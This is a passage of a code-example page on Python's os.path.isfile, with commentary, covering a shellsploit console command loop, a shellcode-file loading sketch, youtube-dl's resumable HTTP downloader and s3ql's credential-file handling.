                    TxtFile(self.disassembly)  

                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown output type: {0}".format(terminal) + bcolors.ENDC)
                self.control(string)                   

            elif terminal[:5] == "clear":
                B3mB4m.clean()
                self.control(string)

            elif terminal[:2].lower() == "ip":
                B3mB4m.IP()
                self.control(string)

            elif terminal[:13] == "show encoders":
                from .core.lists import encoderlist
                encoderlist()
                self.control(string)

            elif terminal[:5] == "disas":
                B3mB4m().startdisas(self.disassembly, string)
                self.control(string)

            else:
                if not terminal:
                    self.control(string)
                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                    self.control(string)
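
The "set shellcode" branch above is where os.path.isfile does the work for this example: a .txt argument is only opened once the check confirms a regular file exists, and a miss yields a "try the full path" hint instead of an IOError. A standalone sketch of that guard, under the assumption that anything else is literal shellcode (load_shellcode is a hypothetical helper, not part of shellsploit):

import os

def load_shellcode(value):
    # .txt arguments are treated as files: open only what os.path.isfile
    # confirms exists, stripping quotes and '+' concatenation noise.
    if value.endswith(".txt"):
        if not os.path.isfile(value):
            raise IOError("File not found, please try the full path.")
        with open(value, "r") as fh:
            return "".join(
                line.strip().replace('"', "").replace("+", "")
                for line in fh
            )
    # Anything else is taken as a literal shellcode string.
    return value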

Example 49

Project: script.module.youtube.dl
Source File: http.py
View license
    def real_download(self, filename, info_dict):
        url = info_dict['url']
        tmpfilename = self.temp_name(filename)
        stream = None

        # Do not include the Accept-Encoding header
        headers = {'Youtubedl-no-compression': 'True'}
        add_headers = info_dict.get('http_headers')
        if add_headers:
            headers.update(add_headers)
        basic_request = sanitized_Request(url, None, headers)
        request = sanitized_Request(url, None, headers)

        is_test = self.params.get('test', False)

        if is_test:
            request.add_header('Range', 'bytes=0-%s' % str(self._TEST_FILE_SIZE - 1))

        # Establish possible resume length
        if os.path.isfile(encodeFilename(tmpfilename)):
            resume_len = os.path.getsize(encodeFilename(tmpfilename))
        else:
            resume_len = 0

        open_mode = 'wb'
        if resume_len != 0:
            if self.params.get('continuedl', True):
                self.report_resuming_byte(resume_len)
                request.add_header('Range', 'bytes=%d-' % resume_len)
                open_mode = 'ab'
            else:
                resume_len = 0

        count = 0
        retries = self.params.get('retries', 0)
        while count <= retries:
            # Establish connection
            try:
                data = self.ydl.urlopen(request)
                # When trying to resume, the Content-Range HTTP header of the response has
                # to be checked against the requested Range HTTP header. This is needed for
                # webservers that don't support resuming and serve the whole file with no
                # Content-Range set in the response despite the requested Range (see
                # https://github.com/rg3/youtube-dl/issues/6057#issuecomment-126129799)
                if resume_len > 0:
                    content_range = data.headers.get('Content-Range')
                    if content_range:
                        content_range_m = re.search(r'bytes (\d+)-', content_range)
                        # Content-Range is present and matches requested Range, resume is possible
                        if content_range_m and resume_len == int(content_range_m.group(1)):
                            break
                    # Content-Range is either not present or invalid. Assuming remote webserver is
                    # trying to send the whole file, resume is not possible, so wiping the local file
                    # and performing entire redownload
                    self.report_unable_to_resume()
                    resume_len = 0
                    open_mode = 'wb'
                break
            except (compat_urllib_error.HTTPError, ) as err:
                if (err.code < 500 or err.code >= 600) and err.code != 416:
                    # Unexpected HTTP error
                    raise
                elif err.code == 416:
                    # Unable to resume (requested range not satisfiable)
                    try:
                        # Open the connection again without the range header
                        data = self.ydl.urlopen(basic_request)
                        content_length = data.info()['Content-Length']
                    except (compat_urllib_error.HTTPError, ) as err:
                        if err.code < 500 or err.code >= 600:
                            raise
                    else:
                        # Examine the reported length
                        if (content_length is not None and
                                (resume_len - 100 < int(content_length) < resume_len + 100)):
                            # The file had already been fully downloaded.
                            # Explanation to the above condition: in issue #175 it was revealed that
                            # YouTube sometimes adds or removes a few bytes from the end of the file,
                            # changing the file size slightly and causing problems for some users. So
                            # I decided to implement a suggested change and consider the file
                            # completely downloaded if the file size differs less than 100 bytes from
                            # the one in the hard drive.
                            self.report_file_already_downloaded(filename)
                            self.try_rename(tmpfilename, filename)
                            self._hook_progress({
                                'filename': filename,
                                'status': 'finished',
                                'downloaded_bytes': resume_len,
                                'total_bytes': resume_len,
                            })
                            return True
                        else:
                            # The length does not match, we start the download over
                            self.report_unable_to_resume()
                            resume_len = 0
                            open_mode = 'wb'
                            break
            except socket.error as e:
                if e.errno != errno.ECONNRESET:
                    # Only a connection reset is retried; anything else is re-raised
                    raise

            # Retry
            count += 1
            if count <= retries:
                self.report_retry(count, retries)

        if count > retries:
            self.report_error('giving up after %s retries' % retries)
            return False

        data_len = data.info().get('Content-length', None)

        # Range HTTP header may be ignored/unsupported by a webserver
        # (e.g. extractor/scivee.py, extractor/bambuser.py).
        # However, for a test we still would like to download just a piece of a file.
        # To achieve this we limit data_len to _TEST_FILE_SIZE and manually control
        # block size when downloading a file.
        if is_test and (data_len is None or int(data_len) > self._TEST_FILE_SIZE):
            data_len = self._TEST_FILE_SIZE

        if data_len is not None:
            data_len = int(data_len) + resume_len
            min_data_len = self.params.get('min_filesize')
            max_data_len = self.params.get('max_filesize')
            if min_data_len is not None and data_len < min_data_len:
                self.to_screen('\r[download] File is smaller than min-filesize (%s bytes < %s bytes). Aborting.' % (data_len, min_data_len))
                return False
            if max_data_len is not None and data_len > max_data_len:
                self.to_screen('\r[download] File is larger than max-filesize (%s bytes > %s bytes). Aborting.' % (data_len, max_data_len))
                return False

        byte_counter = 0 + resume_len
        block_size = self.params.get('buffersize', 1024)
        start = time.time()

        # measure time over whole while-loop, so slow_down() and best_block_size() work together properly
        now = None  # needed for slow_down() in the first loop run
        before = start  # start measuring
        while True:

            # Download and write
            data_block = data.read(block_size if not is_test else min(block_size, data_len - byte_counter))
            byte_counter += len(data_block)

            # exit loop when download is finished
            if len(data_block) == 0:
                break

            # Open destination file just in time
            if stream is None:
                try:
                    (stream, tmpfilename) = sanitize_open(tmpfilename, open_mode)
                    assert stream is not None
                    filename = self.undo_temp_name(tmpfilename)
                    self.report_destination(filename)
                except (OSError, IOError) as err:
                    self.report_error('unable to open for writing: %s' % str(err))
                    return False

                if self.params.get('xattr_set_filesize', False) and data_len is not None:
                    try:
                        write_xattr(tmpfilename, 'user.ytdl.filesize', str(data_len).encode('utf-8'))
                    except (XAttrUnavailableError, XAttrMetadataError) as err:
                        self.report_error('unable to set filesize xattr: %s' % str(err))

            try:
                stream.write(data_block)
            except (IOError, OSError) as err:
                self.to_stderr('\n')
                self.report_error('unable to write data: %s' % str(err))
                return False

            # Apply rate limit
            self.slow_down(start, now, byte_counter - resume_len)

            # end measuring of one loop run
            now = time.time()
            after = now

            # Adjust block size
            if not self.params.get('noresizebuffer', False):
                block_size = self.best_block_size(after - before, len(data_block))

            before = after

            # Progress message
            speed = self.calc_speed(start, now, byte_counter - resume_len)
            if data_len is None:
                eta = None
            else:
                eta = self.calc_eta(start, time.time(), data_len - resume_len, byte_counter - resume_len)

            self._hook_progress({
                'status': 'downloading',
                'downloaded_bytes': byte_counter,
                'total_bytes': data_len,
                'tmpfilename': tmpfilename,
                'filename': filename,
                'eta': eta,
                'speed': speed,
                'elapsed': now - start,
            })

            if is_test and byte_counter == data_len:
                break

        if stream is None:
            self.to_stderr('\n')
            self.report_error('Did not get any data blocks')
            return False
        if tmpfilename != '-':
            stream.close()

        if data_len is not None and byte_counter != data_len:
            raise ContentTooShortError(byte_counter, int(data_len))
        self.try_rename(tmpfilename, filename)

        # Update file modification time
        if self.params.get('updatetime', True):
            info_dict['filetime'] = self.try_utime(filename, data.info().get('last-modified', None))

        self._hook_progress({
            'downloaded_bytes': byte_counter,
            'total_bytes': byte_counter,
            'filename': filename,
            'status': 'finished',
            'elapsed': time.time() - start,
        })

        return True
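
Here os.path.isfile decides whether a partial download can be resumed: an existing temp file seeds resume_len (and thus the Range header) and flips the open mode to append. The kernel of that logic as a sketch; resume_state is a hypothetical name, and encodeFilename plus the downloader state are deliberately stripped out:

import os

def resume_state(tmpfilename, continuedl=True):
    # An existing partial file is resumed from its current size in
    # append mode; otherwise the download starts fresh in write mode.
    if os.path.isfile(tmpfilename):
        resume_len = os.path.getsize(tmpfilename)
    else:
        resume_len = 0
    if resume_len and continuedl:
        return resume_len, 'ab'
    return 0, 'wb'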

Example 50

Project: s3ql
Source File: common.py
View license
def get_backend_factory(storage_url, backend_options, authfile,
                        compress=('lzma', 2), raw=False):
    '''Return factory producing backend objects for given storage-url

    If *raw* is true, don't attempt to unlock and don't wrap into
    ComprencBackend.
    '''

    from .backends import prefix_map
    from .backends.common import (CorruptedObjectError, NoSuchObject, AuthenticationError,
                                  DanglingStorageURLError, AuthorizationError)
    from .backends.comprenc import ComprencBackend

    hit = re.match(r'^([a-zA-Z0-9]+)://', storage_url)
    if not hit:
        raise QuietError('Unable to parse storage url "%s"' % storage_url,
                         exitcode=2)

    backend = hit.group(1)
    try:
        backend_class = prefix_map[backend]
    except KeyError:
        raise QuietError('No such backend: %s' % backend, exitcode=11)

    # Validate backend options
    for opt in backend_options.keys():
        if opt not in backend_class.known_options:
            raise QuietError('Unknown backend option: %s' % opt,
                             exitcode=3)

    # Read authfile
    config = configparser.ConfigParser()
    if os.path.isfile(authfile):
        mode = os.stat(authfile).st_mode
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            raise QuietError("%s has insecure permissions, aborting." % authfile,
                             exitcode=12)
        config.read(authfile)

    backend_login = None
    backend_passphrase = None
    fs_passphrase = None
    for section in config.sections():
        def getopt(name):
            try:
                return config.get(section, name)
            except configparser.NoOptionError:
                return None

        pattern = getopt('storage-url')

        if not pattern or not storage_url.startswith(pattern):
            continue

        backend_login = getopt('backend-login') or backend_login
        backend_passphrase = getopt('backend-password') or backend_passphrase
        fs_passphrase = getopt('fs-passphrase') or fs_passphrase

    if not backend_login and backend_class.needs_login:
        if sys.stdin.isatty():
            backend_login = getpass("Enter backend login: ")
        else:
            backend_login = sys.stdin.readline().rstrip()

    if not backend_passphrase and backend_class.needs_login:
        if sys.stdin.isatty():
            backend_passphrase = getpass("Enter backend passphrase: ")
        else:
            backend_passphrase = sys.stdin.readline().rstrip()

    backend = None
    try:
        backend = backend_class(storage_url, backend_login, backend_passphrase,
                                backend_options)

        # Do not use backend.lookup(), this would use a HEAD request and
        # not provide any useful error messages if something goes wrong
        # (e.g. wrong credentials)
        backend.fetch('s3ql_passphrase')

    except AuthenticationError:
        raise QuietError('Invalid credentials (or skewed system clock?).',
                         exitcode=14)

    except AuthorizationError:
        raise QuietError('No permission to access backend.',
                         exitcode=15)

    except HostnameNotResolvable:
        raise QuietError("Can't connect to backend: unable to resolve hostname",
                         exitcode=19)

    except DanglingStorageURLError as exc:
        raise QuietError(str(exc), exitcode=16)

    except NoSuchObject:
        encrypted = False

    else:
        encrypted = True

    finally:
        if backend is not None:
            backend.close()

    if raw:
        return lambda: backend_class(storage_url, backend_login, backend_passphrase,
                                     backend_options)

    if encrypted and not fs_passphrase:
        if sys.stdin.isatty():
            fs_passphrase = getpass("Enter file system encryption passphrase: ")
        else:
            fs_passphrase = sys.stdin.readline().rstrip()
    elif not encrypted:
        fs_passphrase = None

    if fs_passphrase is not None:
        fs_passphrase = fs_passphrase.encode('utf-8')

    if not encrypted:
        return lambda: ComprencBackend(None, compress,
                                    backend_class(storage_url, backend_login,
                                                  backend_passphrase, backend_options))

    with ComprencBackend(fs_passphrase, compress, backend) as tmp_backend:
        try:
            data_pw = tmp_backend['s3ql_passphrase']
        except CorruptedObjectError:
            raise QuietError('Wrong file system passphrase', exitcode=17)

    # To support upgrade, temporarily store the backend
    # passphrase in every backend object.
    def factory():
        b = ComprencBackend(data_pw, compress,
                            backend_class(storage_url, backend_login,
                                          backend_passphrase, backend_options))
        b.fs_passphrase = fs_passphrase
        return b

    return factory
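
In this last example os.path.isfile both gates the authfile read and anchors a permission check: the credentials file is parsed only if it exists, and it is refused outright when group or others can read it. A standalone sketch of that idiom; read_authfile is a hypothetical name, and SystemExit stands in for s3ql's QuietError:

import configparser
import os
import stat

def read_authfile(authfile):
    # Parse credentials only from an existing file that is private to
    # its owner; a group- or world-readable file is rejected.
    config = configparser.ConfigParser()
    if os.path.isfile(authfile):
        mode = os.stat(authfile).st_mode
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            raise SystemExit('%s has insecure permissions, aborting.' % authfile)
        config.read(authfile)
    return config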